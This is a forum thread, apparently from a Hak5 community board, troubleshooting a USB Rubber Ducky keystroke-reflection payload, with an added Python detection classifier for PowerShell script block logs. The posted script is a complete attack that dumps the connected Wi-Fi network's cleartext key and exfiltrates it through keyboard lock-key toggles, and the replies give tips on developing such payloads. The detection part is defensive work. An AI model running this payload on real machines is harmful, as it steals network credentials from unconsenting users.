geekintheshell, posted March 24:

I start with a blank payload screen (Payload Studio Community), paste code as plain text from the example at https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#example-3. I can see the PowerShell commands executing but a loot file is never created. What am I missing?
dark_pyrro, posted March 24:

Are you linking to the correct example? I can't see any PowerShell commands there (example 2 has such, though).
geekintheshell (author), posted March 24:

Here's the whole script from the example (PS cmds in bold):

REM Example Simple (unobfuscated) Keystroke Reflection Attack for Windows
REM Saves currently connected wireless LAN profile (SSID & Key) to DUCKY
ATTACKMODE HID
LED_OFF
DELAY 2000
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
REM Store the currently connected wireless LAN SSID & Key to %tmp%\z
GUI r
DELAY 100
STRING powershell "netsh wlan show profile name=(Get-NetConnectionProfile)
STRING .Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"
ENTER
DELAY 100
REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.
GUI r
DELAY 100
STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,
STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else
STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
ENTER
DELAY 100
REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.
GUI r
DELAY 100
STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;
STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
ENTER
DELAY 100
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
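From the defender's side, the three PowerShell commands in the script above are what end up in PowerShell script block logging (Event ID 4104) on the target, so they make a natural detection target. The following is an added example, not code from the thread or from Hak5: a small Python classifier run over constructed 4104-style script block text that flags the Wi-Fi profile key dump, the NUMLOCK/CAPSLOCK bit encoding, and the SendKeys lock-key injection. The rule names and sample lines are assumptions made for the example.

```python
import re

# Constructed sample script block text (Event ID 4104 style), modelled on the
# three commands in the payload posted above plus one benign command.
# These are not real captured logs.
SAMPLE_SCRIPT_BLOCKS = [
    "netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear"
    "|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\\z",
    "foreach($b in $(cat $env:tmp\\z -En by)){foreach($a in 0x80,0x40,0x20,"
    "0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else"
    "{$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\\z",
    "$o=(cat $env:tmp\\z);Add-Type -A System.Windows.Forms;"
    "[System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\\z",
    "Get-ChildItem $env:tmp | Sort-Object Length",  # benign, should not match
]

# Hypothetical rule names; each regex targets one stage of the payload.
RULES = {
    # Stage 1: dumping the connected WLAN profile with the key in cleartext.
    "wifi_profile_key_dump": re.compile(
        r"netsh\s+wlan\s+show\s+profile.*key\s*=\s*clear", re.I),
    # Stage 2: building a string of lock-key toggles bit by bit.
    "lock_key_bit_encoding": re.compile(
        r"%\{(?:NUMLOCK|CAPSLOCK)\}.*%\{(?:NUMLOCK|CAPSLOCK)\}", re.I),
    # Stage 3: replaying that string through SendKeys to the keyboard.
    "sendkeys_lock_injection": re.compile(r"SendKeys\]::SendWait\(", re.I),
}


def classify(script_block: str) -> list:
    """Return the names of every rule that matches one script block."""
    return [name for name, rx in RULES.items() if rx.search(script_block)]


def scan(blocks) -> list:
    """Return (index, matched_rules) for every block that triggers a rule."""
    hits = []
    for i, block in enumerate(blocks):
        tags = classify(block)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {', '.join(tags)}")
```

Seeing all three rules fire on one host within a short window is a much stronger signal than any single hit, since the first stage alone also appears in legitimate administration.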
dark_pyrro, posted March 24 (marked as solution):

Yeah, that's example 2, and with that sorted, what output do you get if you run the first PowerShell command manually from the Windows Run dialog (GUI r) on the target machine? Does the target machine have any wireless networks configured?
geekintheshell (author), posted March 24:

Thank you, I wasn't seeing that the 1st PS cmd was not executing completely since it goes away so fast on screen.
dark_pyrro, posted March 24:

Running target-side stuff manually is often a good way to troubleshoot while developing payloads, especially in PowerShell, when windows might just pop up and disappear. Using the -NoExit flag might be helpful in such cases if starting from the Windows Run dialog.